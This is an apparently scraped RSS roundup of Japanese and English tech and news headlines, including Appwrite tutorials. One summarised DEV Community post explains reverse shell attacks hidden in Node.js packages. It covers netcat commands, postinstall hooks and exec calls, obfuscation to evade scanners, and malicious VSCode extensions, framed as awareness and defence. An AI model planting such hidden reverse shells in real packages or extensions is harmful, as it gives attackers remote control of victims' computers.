Posted: 2022-06-29 01:35:21 RSS feed roundup for 2022-06-29 01:00 (39 items)

Category Site name Article title / trend word Link URL Frequent words / summary / search volume Date registered
IT ITmedia All Articles [ITmedia Business Online] Techniques for avoiding air conditioner breakdowns: we asked an expert https://www.itmedia.co.jp/business/articles/2206/29/news056.html itmedia 2022-06-29 00:01:00
AWS AWS - Japan Let's ask the experts! Everything fails, all the time edition ~ #AWSDevLiveShow https://www.youtube.com/watch?v=akrNbubBivU " So, let's speak frankly here and ask the experts in each area of infrastructure, namely networking, storage, compute and databases, about the things we don't understand. From there, let's think about how we can turn our programs into code that is resilient to failures. 2022-06-28 15:21:52
python New posts tagged Python - Qiita I built a LINE bot that uses location information with Python https://qiita.com/kotmats/items/8de977eefcbb6d97ec1d location information 2022-06-29 00:58:22
python New posts tagged Python - Qiita [Python] Report via Gmail when CPU usage falls below 10% https://qiita.com/mugiGAN/items/2d8b3e4490967a5c4eba gmail 2022-06-29 00:19:05
js New posts tagged JavaScript - Qiita Creating a LINE Bot with Azure Functions as the backend https://qiita.com/komiyasa/items/f09c1bbfa9013c693e0e messagin 2022-06-29 00:16:47
AWS New posts tagged AWS - Qiita AWS Associate: things a beginner got wrong while studying, part 3 https://qiita.com/shirochu0911/items/9846a7ab21f175eae65e amazonrd 2022-06-29 00:35:09
Tech blog Developers.IO I diagrammed the relationship between Notion accounts and workspaces and the effects of the options chosen when joining or leaving https://dev.classmethod.jp/articles/about-notion-status-on-account-and-workspaces/ notion 2022-06-28 15:25:33
Tech blog Developers.IO [RPA] A non-engineer tried building an automation tool with UiPath https://dev.classmethod.jp/articles/rpa-by-non-engineer/ roboticprocessautomation 2022-06-28 15:10:10
Overseas tech Ars Technica New trailer offers first hint at Return to Monkey Island’s story https://arstechnica.com/?p=1863171 island 2022-06-28 15:36:14
Overseas tech Ars Technica MNT shrinks its open source Reform laptop into a 7-inch pocket PC throwback https://arstechnica.com/?p=1863037 experiment 2022-06-28 15:19:09
Overseas tech Ars Technica Climate change is altering the chemistry of wine https://arstechnica.com/?p=1863150 unpredictable 2022-06-28 15:07:45
Overseas tech MakeUseOf The 5 Key Benefits of Driving an EV https://www.makeuseof.com/key-benefits-driving-ev/ benefits 2022-06-28 15:45:14
Overseas tech MakeUseOf 4 Tips for Using WhatsApp Web's Privacy Settings https://www.makeuseof.com/whatsapp-web-privacy-settings-tips/ whatsapp 2022-06-28 15:31:14
Overseas tech MakeUseOf How to Delete a File in Use by Another Program in Windows 10 https://www.makeuseof.com/tag/5-ways-delete-file-use-windows/ force 2022-06-28 15:15:14
Overseas tech MakeUseOf How to Create and Use a Password Reset Disk in Windows 10 & 11 https://www.makeuseof.com/windows-password-reset-disk/ windows 2022-06-28 15:15:14
Overseas tech DEV Community Announcing Modern CSS Challenges https://dev.to/5t3ph/announcing-modern-css-challenges-472o Announcing Modern CSS ChallengesOver the past few years I ve heard feedback that folks wish there was a learning journey available for using the Modern CSS tutorials to build up their CSS skills Today I m very excited to share the pre launch of Modern CSS Challenges an educational companion to the tutorials available on ModernCSS dev This free series of challenges will push you to use your existing CSS knowledge while also expanding your awareness and ability to use modern CSS features I ve created this resource as guided practice for building very real world components You ll work on responsive design using custom properties building scalable layouts and more All the while ensuring that you re including features critical for accessibility As you progress through the challenges bonus challenges will be unlocked to learn advanced skills and practice cutting edge CSS While free challenges include access to the basic solution I m also creating a thorough video series that you ll be able to purchase either per challenge or as package deals Videos will include full transcripts with code snippets so you can opt to read the content too Sign up for launch notificationsI m working through fine tuning the challenge content and videos and hope to launch in the next couple months I ll also be sharing a discount code for the videos and offering early access via my newsletter PS are you looking for hands on learning to update your CSS skills Join my comprehensive virtual CSS workshop starting July Register and learn more about the workshop 2022-06-28 15:39:48
Overseas tech DEV Community Building a Realtime chat application using Angular and Appwrite 🤓 https://dev.to/appwrite/building-a-realtime-chat-application-using-angular-and-appwrite-i3o Building a Realtime chat application using Angular and Appwrite Appwrite is an open source backend as a service that provides developers with a core set of functionality needed to build any application with any stack From database interactions to authentication real time updates and more When building web applications with Angular it s common practice to connect to different APIs to manage data authenticate users and possibly listen to live updates to data The APIs to connect to these different services could be done through multiple providers With Appwrite you can do all of these things using a single backend This post shows you how to get up and running with Appwrite authenticate users manage data and listen to realtime events using a chat application PrerequisitesTo get started with Appwrite you need to have Docker installed on your local machine or server After you have Docker running use the following command to install and run Appwrite docker run it rm volume var run docker sock var run docker sock volume pwd appwrite usr src code appwrite rw entrypoint install appwrite appwrite Also check out the complete installation guide for more information about the process If everything went smoothly you can visit the Appwrite Console and register your root account Next let s set up the first project Creating a ProjectYou can host many different applications in Appwrite using projects To create a project Click on Create ProjectClick on the pencil icon and enter ngchat as the custom Project IDEnter Angular Chat as the nameClick CreateNext let s setup the database and collection for the chat application Creating a Database and CollectionA database in Appwrite is group of collections for managing data To create a database visit the Database section Click on Create DatabaseEnter chat as the custom 
Database IDEnter Chat as the nameClick CreateFor the collection Click on Create CollectionEnter messages as the custom Collection IDEnter Chat Messages as the nameClick CreateWe also want to configure permissions for the collection for read write access For messages you ll choose Document Level permissions You can choose more granular permissions depending on your use case The permissions page has more details on permissions so the user keeps ownership of their message Creating Collection AttributesEach collection in an Appwrite database consists of attributes that model the structure for the document you want to store For the chat application you ll store the user s name and message Creating Document AttributesAttributes can be defined as strings numbers emails and more To create an attribute Click on Create Attribute Select the type of Attribute to create Use the table below to create the necessary attributes for chat keysizerequiredarrayusertruefalsemessagetruefalseWhen a document is created in the collection it also has extra metadata for the when the document is created and updated named createdAt and updatedAt respectively You can use this metadata for querying syncing and other use cases You can do other things like toggle services choose which OAuth provider to use and more but for this chat application anonymous authentication is used which is also enabled by default Next let s put the Angular application together Building with AngularTo start clone an existing repository already running Angular version with a couple of routes setup for login and chat Use the command below to clone the GitHub repository git clone git github com brandonroberts appwrite angular chat gitInstall the dependencies yarnAnd start the application to get the development server runningyarn startNavigate to http localhost in the browser to view the login page Setting up the Appwrite ConfigTo configure Appwrite in our Angular project configure some environment variables first for the 
Appwrite endpoint project and collection values Update the src environments environment tsexport const environment endpoint http localhost v projectId ngchat databaseId chat chatCollectionId messages production false After the environment variables are set move on to setting up the Appwrite Web SDK To initialize the Appwrite Web SDK use the appwrite package installed earlier along with setting up some Injection Tokens in Angular to be able to inject the SDK into services created later Let s create tokens one for the Appwrite Environment variables and one for the SDK instance itself Create a new file named src appwrite ts and configure the tokens as root providers import inject InjectionToken from angular core import Account Client as Appwrite Databases from appwrite import environment from src environments environment interface AppwriteConfig endpoint string projectId string databaseId string chatCollectionId string export const AppwriteEnvironment new InjectionToken lt AppwriteConfig gt Appwrite Config providedIn root factory const endpoint projectId databaseId chatCollectionId environment return endpoint databaseId projectId chatCollectionId The first token sets up the environment variables so they can be injected to one or more services export const AppwriteApi new InjectionToken lt database Databases account Account gt Appwrite SDK providedIn root factory const env inject AppwriteEnvironment const appwrite new Appwrite appwrite setEndpoint env endpoint appwrite setProject env projectId const database new Databases appwrite env databaseId const account new Account appwrite return database account The second token creates an instance of the Appwrite Web SDK sets the endpoint to point to the running Appwrite instance and the project ID configured earlier After the Appwrite SDK is setup let s create some services for authentication and accessing chat messages First let s create an src auth service ts that allows you to login check auth status and logoutimport 
inject Injectable from angular core import Router from angular router import Models from appwrite import BehaviorSubject concatMap from tap mergeMap from rxjs import AppwriteApi from appwrite Injectable providedIn root export class AuthService private appwriteAPI inject AppwriteApi private user new BehaviorSubject lt Models User lt Models Preferences gt null gt null readonly user this user asObservable constructor private router Router login name string const authReq this appwriteAPI account createAnonymousSession return from authReq pipe mergeMap gt this appwriteAPI account updateName name concatMap gt this appwriteAPI account get tap user gt this user next user async isLoggedIn try const user await this appwriteAPI account get this user next user return true catch e return false async logout try await this appwriteAPI account deleteSession current catch e console log e finally this router navigate this user next null The AuthService injects the Appwrite SDK to Authenticate the user with the login method update the name and store the current user in an observable Checks to see if the user is logged in and returns a booleanLogs the user out by clearing the current sessionWith the Appwrite SDK all of this is done without using Angular s HttpClient service You can always access Appwrite s REST APIs directly but it s not required as the SDK handles this for you Next let s create the src chat service ts to load and send chat messages import inject Injectable from angular core import Models RealtimeResponseEvent from appwrite import BehaviorSubject take concatMap filter from rxjs import AppwriteApi AppwriteEnvironment from appwrite import AuthService from auth service export type Message Models Document amp user string message string Injectable providedIn root export class ChatService private appwriteAPI inject AppwriteApi private appwriteEnvironment inject AppwriteEnvironment private messages new BehaviorSubject lt Message gt readonly messages this messages 
asObservable constructor private authService AuthService loadMessages this appwriteAPI database listDocuments lt Message gt this appwriteEnvironment chatCollectionId undefined undefined ASC then response gt this messages next response documents sendMessage message string return this authService user pipe filter user gt user take concatMap user gt const data user user name message return this appwriteAPI database createDocument this appwriteEnvironment chatCollectionId unique data role all user user id The ChatService Injects the Appwrite Environment variablesSets up an observable of chat messagesUses the Appwrite SDK to load chat messages from the messages collectionGets the currently logged in user to add chat messages to the messages collection Assigns permissions to the document so anyone can read but only the specific user can update delete With the services set up we can move on to the components for login and chat Building the Login pageFor the login component use the AuthService to login using anonymous authentication with the provided name ​import Component from angular core import FormControl FormGroup ReactiveFormsModule from angular forms import Router from angular router import tap from rxjs import AuthService from auth service Component selector app login standalone true imports ReactiveFormsModule template lt div class app container gt lt div class content gt lt span class appwrite chat gt Angular Chat lt span gt lt div class login container gt lt form formGroup form class login form ngSubmit login gt lt p class login name gt lt label for name gt Name lt label gt lt input type text id name formControlName name placeholder Enter Name gt lt p gt lt button type submit gt Start Chatting lt button gt lt form gt lt div gt lt div gt lt div gt export class LoginComponent form new FormGroup name new FormControl nonNullable true constructor private authService AuthService private router Router login const name this form controls name value this authService 
login name pipe tap gt this router navigate chat subscribe After the authentication is successful we redirect to the chat page Displaying Chat MessagesWith the Chat component start with displaying chat messages using the ChatService ​​import CommonModule from angular common import Component OnInit from angular core import FormControl FormGroup ReactiveFormsModule from angular forms import tap from rxjs import ChatService from chat service import AuthService from auth service Component selector app chat standalone true imports CommonModule ReactiveFormsModule template lt div class chat container ngIf user async as vm else loading gt lt div class chat header gt lt div class title gt Let s Chat lt div gt lt div class leave click logout gt Leave Room lt div gt lt div gt lt div class chat body gt lt div id message id ngFor let message of messages async class message gt lt span class name gt message user lt span gt message message lt div gt lt div gt lt div class chat message gt lt form formGroup form ngSubmit sendMessage gt lt input type text formControlName message placeholder Type a message gt lt button type submit class send message gt lt svg class arrow width height viewBox fill none xmlns gt lt path d M C C L C C L C VC C VC L C C L Z fill BD gt lt svg gt lt button gt lt form gt lt div gt lt div gt lt ng template loading gt Loading lt ng template gt styles export class ChatComponent implements OnInit form new FormGroup message new FormControl nonNullable true user this authService user messages this chatService messages constructor private authService AuthService private chatService ChatService ngOnInit this chatService loadMessages sendMessage const message this form controls message value this chatService sendMessage message pipe tap gt this form reset subscribe async logout await this authService logout The ChatComponent makes use of the AuthService and ChatService to Use the current logged in userListen to the observable of chat messages Load the chat messages 
in the ngOnInit of the componentUse the input field to send the message using the ChatServiceLogout from the chat pageWe re able to load chat messages but let s add the interesting part and integrate some realtime chat messages Connecting to Realtime EventsAppwrite provides realtime updates from practically every event that happens in the Appwrite system such as database records being inserted updated or deleted These events are provided through a WebSocket To subscribe to realtime update the ChatService with a listenToMessages method to subscribe to events from the messages collection export class ChatService listenToMessages return this appwriteAPI database client subscribe databases chat collections messages documents res RealtimeResponseEvent lt Message gt gt if res events includes databases chat collections messages documents create const messages Message this messages value res payload this messages next messages Whenever a new message is created the new message is pushed into the observable of users so we have realtime updates wired up To start listening to realtime events Update the ngOnInit of the ChatComponent to call the method Store the live connection for unsubscribing Destroy the live connection when the component is destroyedexport class ChatComponent implements OnInit OnDestroy messageunSubscribe gt void form new FormGroup message new FormControl nonNullable true user this authService user messages this chatService messages constructor private authService AuthService private chatService ChatService ngOnInit this chatService loadMessages this messageunSubscribe this chatService listenToMessages ngOnDestroy this messageunSubscribe SummaryAnd that s it We now have a functioning Angular application with AuthenticationDatabase managementRealtime eventsThere s more we could do here but as you can see you can build just about anything with the core functionality already taken care of And cloud functions help you extend the functionality of Appwrite even 
further To view the working example GitHub Repo Learn MoreGetting Started TutorialAppwrite GitHubAppwrite DocsDiscord CommunityIf you liked this click the ️so other people will see it Follow Brandon Roberts and Appwrite on Twitter for more updates 2022-06-28 15:19:15
Overseas tech DEV Community Custom Svelte Store with Appwrite and Caching https://dev.to/appwrite/custom-svelte-store-with-appwrite-and-caching-1m6d Custom Svelte Store with Appwrite and CachingWho wouldn t love cache right Let s see how we can cache data with Svelte amp Appwrite We re going to explore how we can create a Svelte store that caches our data and is dynamically updated Luckily for us it s pretty easy The TL DR is Create a store with set subscribe and loadSet the data to the cacheUpdate the cache by subscribing to the data changesUpdate the data dynamically by calling the load function in your component Let s set everything up We ll start by creating an appwrite js store to make our life easier import Client from appwrite const server endpoint import meta env VITE APP ENDPOINT toString project import meta env VITE APP PROJECT toString collection import meta env VITE APP COLLECTION ID toString database import meta env VITE APP DATABASE ID toString const client new Client client setEndpoint server endpoint setProject server project export client server You can check a complete example hereThis allows us to access Appwrite s sdk from wherever we want Remember to add all the endpoints in the env file at your project s root The fun begins Now let s initialize another store where we will implement our caching import client server from appwrite This is the store we created previouslyimport Databases from appwrite import writable from svelte store import browser from app env We ll use this to check if we are in the browserfunction createDocumentsListStore Magic unicorns export const documentsList createDocumentsListStore Great Let s work a little bit on that function We want to create a writable store that can fetch our cached data and is easy to update function createDocumentsListStore const subscribe set writable Check if we re in the browser If we are check the session storage for a item named documents and parse it This is our response If we re not in the browser 
or if there is no item stored the response is null response browser JSON parse sessionStorage getItem documents null return subscribe set load async queries limit offset gt try const database new Databases client server database const response database listDocuments server collection We imported server from the appwrite js store queries limit offset undefined undefined created at DESC set response catch error Handle the error So with this function we check if there is data in the session storage and set the response to it Where s my cache We have a small problem we ve yet to save anything in our cache Luckily for us it s pretty straightforward if browser documentsList subscribe n gt sessionStorage setItem documents JSON stringify n response We simply subscribe to the store and save the data in the session storage each time it changes set subscribe loadNow we have another problem The data is set and our cache is always up to date but the data never changes That s what load is for For example in our component we can do something like this lt script gt import documentsList from store let queries limit offset documentsList load queries limit offset lt script gt if documentsList response total each documenstList response document as document lt pre gt document lt pre gt each if This way each time one of the arguments passed to load changes the data will be updated And now we have an Appwrite store with cached data Let s put it all together In the end our store looks like this import client server from appwrite import Databases from appwrite import writable from svelte store import browser from app env function createDocumentsListStore const subscribe set writable response browser JSON parse sessionStorage getItem documents null return subscribe set load async queries limit offset gt try const database new Databases client server database const response database listDocuments server collection queries limit offset undefined undefined created at DESC set response catch 
error Handle the error export const documentsList createDocumentsListStore if browser documentsList subscribe n gt sessionStorage setItem documents JSON stringify n response ConclusionAnd that s all it takes to implement a custom svelte store with Appwrite amp caching You can view the following resources as well if you want to explore Appwrite further Appwrite DocsAppwrite DiscordAppwrite GitHub 2022-06-28 15:10:53
Overseas tech DEV Community Gaining remote access to a computer with a reverse shell attack in Node.js https://dev.to/devdevcharlie/gaining-remote-access-to-a-computer-with-a-reverse-shell-attack-in-nodejs-3a40 Gaining remote access to a computer with a reverse shell attack in Node jsOriginally posted on my blogI recently learnt what a reverse shell is and got excited to experiment running this kind of attack via a Node js module This post will go through my thought process and the different options I tried Important notes I am writing this blog post for educational purposes only Running a reverse shell attack on someone without their approval is illegal my only motivation is to share knowledge and raise awareness so people can protect themselves I am not taking any responsibility for how you decide to use the information shared in this post What is a reverse shell A reverse shell is a tool that allows a computer to have remote access to another one It can be very useful if you want to transfer files between multiple computers or if you want to access information you need that is stored on another computer and network However it can also be used to run attacks in which a victim unknowingly initiates a remote shell connection to an attacker s system allowing the attacker to have nearly complete access to their system If you think about shell commands you might be familiar with such as ls to list a directory s files pwd to show the path to the current directory or nano to edit the content of files a reverse shell allows an attacker to run these commands on a target s system without them knowing How to create a reverse shellA common tool to execute a reverse shell is called netcat If you re using macOS it should be installed by default You can check by running nc help in a terminal window Using a private IP address on a local networkYou can run a simple example of reverse shell between two computers on the same network On the first computer start two listeners on different 
ports for example one on port and the other on port Command tested on macOS the path to netcat is different on other OS usr bin nc l usr bin nc l The flag l starts netcat on listening mode so it will listen to traffic happening on these two ports On the second computer run the following command nc lt first computer IP address gt bin sh nc lt first computer IP address gt This command initiates a connection to the first computer on the two ports specified above and indicates that any command received on port should be executed as a bash command and send the result to port Below is an example of this code working As a second computer I have a Raspberry Pi set up in my apartment connected to the same network as my laptop In the terminal I ssh into the Pi in the first pane The second and third pane start the listeners on port and When the listeners are ready I run the netcat command in the Pi From there I m able to access its file system from my laptop I run commands such as ls whoami and pwd in the terminal window listening on port and the result shows in the third pane on the far right I m also able to change the name of a file from test js to index js You can imagine how useful this tool is for example if you want to transfer files easily between two computers on the same network Using a public IP addressIn the example above I showed how to create a reverse shell between computers on the same network however when running this as an attack to gain access to a victim s computer both devices will probably be connected to different networks so the code above won t work Indeed the code sample shown in the previous section uses the device s private IP address on my local network This private IP address cannot be accessed from outside my home network To be able to use a public IP address I ve decided to use Linode to create a virtual machine VM that both the target and attacker will connect to Once the VM finished spinning up I replaced the private IP address from the code 
above with the public IP address of the VM For the purpose of this post let s imagine this IP address is From my laptop I connect to my VM using the following command ssh root From there similar commands from the ones shown in the previous section can be run nc l s nc l s The additional s is used to indicate the source IP address so the VM s public IP address Then on the target s computer the following command needs to be run nc bin sh nc disown exit The additional disown is used to run the program continuously in the background and exit is used to terminate it so the terminal does not look like the program is still executing even though it is Once these commands are run I have access to the second computer s system no matter if it is inside or outside of my home network So now how can we get a target to run this Running a reverse shell in a Node js moduleA few weeks ago I wrote a post about how to run a ransomware attack in a Node js module and in the same spirit I explored a few different ways to run a reverse shell attack using the same medium postinstallOne way to run this would be to take advantage of the postinstall attribute of a module s package json file This command runs right after a package has finished installing so it wouldn t even require the target to import and use it This could be done in two ways first by running the command directly scripts postinstall nc bin sh nc exit Or running the command in a separate JavaScript file scripts postinstall node index js Even though using postinstall would work it may look quite obvious if a user decided to look at the source code before installing the package especially if the command is run directly so the package could get flagged quickly If postinstall is running a JS file it might look less obvious but how would it start the reverse shell Using exec or execFileTo run this command in a JS file you can use exec and execFile exec executes the command passed to the function const exec require child process 
exec nc bin sh nc disown exit process exit. execFile executes a file, for example script.sh: const execFile require child process execFile bash script sh gt process exit. This shell script would contain the netcat command: bin bashnc bin sh nc disown exit. It can either be added as a file in the repository or fetched from another source to avoid attracting attention. As soon as the reverse shell is set up, an attacker can steal, delete or encrypt files, install tools, and much more. The solutions shown above are picked up by security tools such as Socket that flags the use of potentially insecure code such as exec and execFile. So what are ways to hide more efficiently this kind of attack? Ways to hide a reverse shell: There's a few ways I could think about doing this; some of them involve technical solutions and others involve thinking more about the context in which people use Node.js modules. File obfuscation and minification: Security tools are getting better at flagging potential insecure code in Node.js modules; however, once obfuscated, it becomes a lot harder to know if a piece of code contains vulnerabilities. As an example, here's what the obfuscated JavaScript of the exec implementation looks like. This code still works but isn't flagged anymore. You could imagine that a package author could hide this code in a minified version of their package and advise people to use that one for improved performance. I also tested this by minifying the original code, which is still humanly readable. Here's the result: const exec exec require child process exec nc bin sh nc disown exit process exit. By default, if the file index.min.js is not specified as the exported file in the main field of the package.json, Socket does not flag any issue. However, once changed to index.min.js, the security issues are shown in the UI. VSCode extension: Even though VSCode extensions are NPM packages, the way users install them is via the VSCode editor, so it is likely that people use the ease of a one-click install without checking the extension's code first. Extensions may go through a security check before being publicly available; however, some attacks have been run via extensions. When creating an extension, you can specify when you'd like the code to run, including anytime the editor is launched. To do so, you can specify the value or onStartupFinished as activationEvents. This would call the activate function that can be modified to run the reverse shell by adding a single line of code: exec nc bin sh nc disown exit. To try this out, I created a small Hello World extension following the official documentation. I added the line shown above in the activate function, ran the extension in the Extension Development Host window, and activated it. Below is the result, showing how I gained access to my personal laptop from my RaspberryPi. I am not sure what kind of security process extensions go through before being publicly available, but it is also possible for developers to make their extensions available via GitHub instead of the VSCode Marketplace. This way, even if this extension was rejected for security reasons, an attacker might still try to make it available by instructing users to install it manually. Electron app: Electron applications are also written in Node.js and can be installed without checking the source code first. Looking at this list of Electron apps, it is easy to imagine how one could create a small productivity app with a hidden reverse shell. How can people protect themselves? One of the interesting aspects of experimenting with this is to think about ways people can protect themselves from these types of attacks. So far, here are a few options I can think of: Use one of the many security tools available and pay attention to their warnings. Check the source code of open source tools before installing and using them. Run your projects in a virtual machine or online sandbox such as CodeSandbox, StackBlitz, Github CodeSpaces. To check for reverse shell attacks specifically, you can run the ps command in your terminal to check the current processes running and terminate any that looks suspicious. When using a minified version of a NPM package, make sure it does not include some unexpected code by copying the non-minified version of the tool, minifying it yourself, and comparing the results. A way to stop the connection established by a reverse shell could be to turn your computer off/on; however, if hidden in a package you use often, the connection would restart anytime you use that package. Some of these solutions may sound a bit impractical, but depending on the risk you're willing to take, it is definitely something worth thinking about. Conclusion: There are probably more ways to run a reverse shell than the ones I explored here, but I hope this post gave you a better understanding of what a reverse shell is, how to create one, and raised some awareness of the risks associated with using open source packages. 2022-06-28 15:06:44
Apple AppleInsider - Frontpage News AirTags help Toronto man track down stolen Range Rover https://appleinsider.com/articles/22/06/28/airtags-help-toronto-man-track-down-stolen-range-rover?utm_medium=rss AirTags help Toronto man track down stolen Range Rover. Three AirTag trackers helped the owner of the SUV locate the vehicle, which was then recovered by police. After having his first Range Rover stolen a month ago, a man from the Avenue Road and Lawrence Avenue area of Toronto, Ontario, Canada purchased an identical unit to replace the lost vehicle. The first unit was never found, as the thief had thrown the owner's wallet and family member's phone out of the Rover before driving off with it, in an apparent attempt to prevent tracking. "The thieves were able to disable the tracker in my car, put there by the manufacturer," according to the man, who for safety concerns has been identified only by his first name, Lorne. 2022-06-28 15:54:54
Apple AppleInsider - Frontpage News Deals: save $220 on Apple's 1TB 14-inch MacBook Pro, but only for a limited time https://appleinsider.com/articles/22/06/28/deals-save-220-on-apples-1tb-14-inch-macbook-pro-but-only-for-a-limited-time?utm_medium=rss Deals save on Apple's TB inch MacBook Pro but only for a limited time. The exclusive MacBook Pro deal drops the price of the spacious TB inch MacBook Pro to a discount of off retail now through June. Take advantage of the cheapest price available on Apple's TB inch MacBook Pro through June. B&H Photo is hosting the best-of-the-web offer on the M Pro MacBook Pro inch in your choice of Silver or Space Gray. Equipped with an upgraded M Pro chip with a core CPU, core GPU and GB of unified memory, this configuration also has TB of storage, double that of the standard inch MacBook Pro. 2022-06-28 15:31:14
Overseas Tech Engadget Google is trying to keep political campaign emails out of Gmail spam folders https://www.engadget.com/google-gmail-political-campaign-emails-spam-folder-151541496.html?src=rss Google is trying to keep political campaign emails out of Gmail spam folders. Google is working on a way to ensure emails from US political campaigns reach users' Gmail inboxes instead of automatically getting dumped into the spam folder. The company has asked the Federal Election Commission for approval on a plan to make emails from "authorized candidate committees, political party committees and leadership political action committees registered with the FEC" exempt from spam detection, as long as they abide by Gmail's rules on phishing, malware and illegal content. "We want Gmail to provide a great experience for all of our users, including minimizing unwanted email, but we do not filter emails based on political affiliation," Google spokesperson José Castañeda told Axios, which first reported on the move. Castañeda added that the pilot program "may help improve inboxing rates for political bulk senders and provide more transparency into email deliverability, while still letting users protect their inboxes by unsubscribing or labeling emails as spam." If the project goes ahead, users will see a prominent notification the first time they receive an email from a campaign. They'll be asked if they want to keep receiving such emails. They'll be able to opt out of campaign notices later too. That should help cut down on unwanted campaign emails, especially for users who didn't sign up to receive them in the first place, while making sure they still hit inboxes. Google has noted that a key reason why Gmail puts many campaign emails in the spam folder is because other users often mark the missives as spam. A North Carolina State University study from earlier this year found that Gmail was more likely than Yahoo (Engadget's parent company) and Microsoft Outlook to algorithmically filter emails from Republican campaigns as spam during the campaign. Republican leaders this month introduced a bill that seeks to make it illegal for email service providers to automatically put campaign messages in the spam folder. It would also require operators to issue a quarterly transparency report detailing how many times campaign messages were flagged as spam, with breakdowns for emails from both the Republican and Democratic parties. In addition, providers would have to disclose the tools they use to determine which campaign emails to mark as spam. 2022-06-28 15:15:41
Cisco Cisco Blog Cisco Talos Supports Ukraine Through Empathy https://blogs.cisco.com/security/cisco-talos-supports-ukraine-through-empathy employees 2022-06-28 15:56:55
Overseas Tech WIRED 17 Best Early Amazon Prime Day Deals https://www.wired.com/story/early-amazon-prime-day-deals-and-tips-2022-1/ event 2022-06-28 15:09:00
Finance Financial Services Agency website Published the trial results for projects selected for support under the "FinTech Proof-of-Concept Hub". https://www.fsa.go.jp/news/r3/sonota/20220628/20220628.html fintech 2022-06-28 17:00:00
News BBC News - Home Scottish independence: 19 October 2023 proposed as date for referendum https://www.bbc.co.uk/news/uk-scotland-scotland-politics-61968607?at_medium=RSS&at_campaign=KARANGA court 2022-06-28 15:49:24
News BBC News - Home Met Police placed into advanced stage of monitoring https://www.bbc.co.uk/news/uk-england-london-61970399?at_medium=RSS&at_campaign=KARANGA everard 2022-06-28 15:46:45
News BBC News - Home BBC pays damages to ex-producer over Martin Bashir's Princess Diana interview https://www.bbc.co.uk/news/entertainment-arts-61959015?at_medium=RSS&at_campaign=KARANGA diana 2022-06-28 15:13:20
News BBC News - Home England's Morgan confirms international retirement https://www.bbc.co.uk/sport/cricket/61966257?at_medium=RSS&at_campaign=KARANGA cricket 2022-06-28 15:24:12
Hokkaido Hokkaido Shimbun A traditional breeze on Notsuke Bay: summer Hokkai shrimp fishing begins https://www.hokkaido-np.co.jp/article/699234/ Nemuro region 2022-06-29 00:54:16
Hokkaido Hokkaido Shimbun Russian president visits Central Asia; first foreign trip since the invasion, unity reaffirmed https://www.hokkaido-np.co.jp/article/699259/ Central Asia 2022-06-29 00:54:00
Hokkaido Hokkaido Shimbun Doi and Daniel lose in the first round; Wimbledon day 2 https://www.hokkaido-np.co.jp/article/699258/ elimination 2022-06-29 00:49:00
Hokkaido Hokkaido Shimbun Power "tight supply preparation" notice continues, says Hokkaido Electric Power Network; government holds off on advisory https://www.hokkaido-np.co.jp/article/699243/ Hokkaido Electric Power 2022-06-29 00:38:45
Hokkaido Hokkaido Shimbun Seibu 5-2 Nippon-Ham (28th): Nippon-Ham fails to extend winning streak https://www.hokkaido-np.co.jp/article/699189/ Nippon-Ham 2022-06-29 00:33:53
Hokkaido Hokkaido Shimbun US bans imports of Russian gold; sanctions on defense industry too https://www.hokkaido-np.co.jp/article/699246/ US Treasury Department 2022-06-29 00:20:00
Hokkaido Hokkaido Shimbun 92-year-old man dies after being strangled in Sendai; police plan to question injured son https://www.hokkaido-np.co.jp/article/699242/ Miyagino Ward, Sendai 2022-06-29 00:14:00
Hokkaido Hokkaido Shimbun How to save power in cool Hokkaido? Power "tight supply preparation" continues; confusion voiced: "We don't even have air conditioning" https://www.hokkaido-np.co.jp/article/699239/ Hokkaido Electric Power 2022-06-29 00:10:00
Hokkaido Hokkaido Shimbun Heavy rain forecast in Hokkaido again on the 29th https://www.hokkaido-np.co.jp/article/699238/ within Hokkaido 2022-06-29 00:05:00
Hokkaido Hokkaido Shimbun New Japan Coast Guard commandant holds inaugural press conference: "Full effort on Shiretoko accident investigation" https://www.hokkaido-np.co.jp/article/699236/ Ministry of Land, Infrastructure, Transport and Tourism 2022-06-29 00:02:00
